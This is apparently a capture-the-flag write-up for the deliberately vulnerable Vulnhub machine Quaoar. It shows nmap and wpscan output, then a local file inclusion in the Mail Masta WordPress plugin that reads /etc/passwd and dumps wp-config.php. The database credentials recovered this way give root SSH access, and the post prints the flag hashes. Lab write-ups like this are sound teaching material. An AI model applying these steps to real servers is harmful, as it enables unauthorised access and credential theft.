Quaoar is a vulnerable virtual-machine available on Vulnhub.com. It is designed with beginners in mind, and doesn’t require the use of any advanced exploitation techniques.
I already knew Quaoar’s IP address(192.168.56.100), as it is displayed when the machine initially boots up. So I began with a standard nmap scan to see what services the machine was running:
nmap -Pn 192.168.56.100
Nmap scan report for 192.168.56.100 Host is up (0.00052s latency). Not shown: 991 closed ports PORT STATE SERVICE 22/tcp open ssh 53/tcp open domain 80/tcp open http 110/tcp open pop3 139/tcp open netbios-ssn 143/tcp open imap 445/tcp open microsoft-ds 993/tcp open imaps 995/tcp open pop3s MAC Address: 08:00:27:7B:EB:52 (Oracle VirtualBox virtual NIC)
The http server running on port 80 immediately stood out to me, as web applications are a great place to look for low-hanging fruit. After doing a little manual prodding, I noticed that ‘robots.txt’ mentioned the /wordpress/ directory. When hunting for vulnerabilities, WordPress is always a great place to look.
So I decided to run wpscan and enumerate any plugins that may be vulnerable:
wpscan -u http://192.168.56.100/wordpress/ -e vp
[!] Title: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI) Reference: https://wpvulndb.com/vulnerabilities/8609 Reference: https://cxsecurity.com/issue/WLB-2016080220 Reference: https://www.exploit-db.com/exploits/40290/ [!] Title: Mail Masta 1.0 - Multiple SQL Injection Reference: https://wpvulndb.com/vulnerabilities/8740 Reference: https://github.com/hamkovic/Mail-Masta-Wordpress-Plugin Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6095 Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6096 Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6097 Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6098
A WordPress plugin that has both SQL Injection and Local-file Inclusion vulnerabilities? Shocking.
I began messing with the local file inclusion vulnerability and was able to view /etc/passwd, which was a great sign. However, after trying to look at ‘wp-config.php’, I kept getting a blank page returned. I realized the PHP code was executing instead of being displayed in the browser. The work-around? Base-64 encoding.
This returned a nice block of base-64 encoded text. When decoded, I got this(truncated):
/** MySQL database username */ define('DB_USER', 'root'); /** MySQL database password */ define('DB_PASSWORD', 'rootpassword!');
I noticed that the mySQL username was ‘root’, which was odd. On a whim, I tried using these credentials to SSH into the server:
root@windows-vista:~# ssh 192.168.56.100 -l root firstname.lastname@example.org's password: Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686) * Documentation: https://help.ubuntu.com/ System information as of Tue Mar 28 19:47:10 EDT 2017 System load: 0.0 Processes: 98 Usage of /: 31.8% of 7.21GB Users logged in: 0 Memory usage: 23% IP address for eth0: 192.168.56.100 Swap usage: 0% IP address for virbr0: 192.168.122.1 Graph this data and manage this system at https://landscape.canonical.com/ New release '14.04.5 LTS' available. Run 'do-release-upgrade' to upgrade to it. Last login: Sun Mar 26 19:47:06 2017 root@Quaoar:~#
And there we have it, root privileges.
The first flag I found was located in the root directory:
root@Quaoar:~# pwd /root root@Quaoar:~# cat flag.txt 8e3f9ec016e3598c5eec11fd3d73f6fb root@Quaoar:~#
I found the second flag in the ‘/home/wpadmin/’ directory with the help of the ‘locate’ command:
root@Quaoar:~# locate flag.txt /home/wpadmin/flag.txt /root/flag.txt root@Quaoar:~# cat /home/wpadmin/flag.txt 2bafe61f03117ac66a73c3c514de796e root@Quaoar:~#
This machine has a third flag, but I wasn’t too interested in searching for it.
This was a quick and easy machine. After I finished, I read a few other write-ups and had realized I missed a pretty important detail: WordPress’ admin account used “admin:admin” credentials. Had I tried that first, I could have easily logged in to WordPress and used a PHP webshell to gain access to the server. However, in hindsight, it was more fun to exploit Mail Masta’s local file inclusion vulnerability and dump the wp-config.php file with the help of some base-64 encoding.
Thanks for reading!